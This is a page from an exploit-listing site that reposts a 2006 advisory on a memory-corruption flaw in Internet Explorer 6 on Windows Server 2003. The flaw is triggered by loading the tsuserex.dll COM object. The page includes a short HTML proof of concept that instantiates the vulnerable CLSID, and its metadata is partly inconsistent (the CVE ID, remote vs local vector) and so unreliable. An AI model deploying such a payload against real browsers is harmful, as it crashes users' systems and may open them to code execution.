Advertisement






Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability

CVE Category Price Severity
CVE-2002-1149 CWE-119 Not specified High
Author Risk Exploitation Type Date
evilwiz High Remote 2006-08-23
CPE PURL
cpe:cpe:/o:microsoft:windows_server_2003
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080112

Below is a copy:

Advisory ID:
XSec-06-06

Advisory Name:
Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability

Release Date:
08/18/2006

Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN

Affected version:
Windows Server 2003 + Internet Explorer 6.0

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
A vulnerability has been found in Internet Explorer 6.0 on Microsoft Windows 2003. When Internet Explorer tries to instantiate the tsuserex.dll (Terminal Services) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.

Exploit:
=============== tsuserex.dll.htm start ================

<!--
// Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation
Vulnerability
// tested on Windows 2003 EE SP1 CN

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}
// Info: ADsTSUserEx Class
// ProgID: tsuserex.ADsTSUserEx.1
// InprocServer32: C:WINDOWSsystem32tsuserex.dll

--!>

<html><body>
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
</body>
</html>

=============== tsuserex.dll.htm end ==================

Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14

About XSec:
We are redhat.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum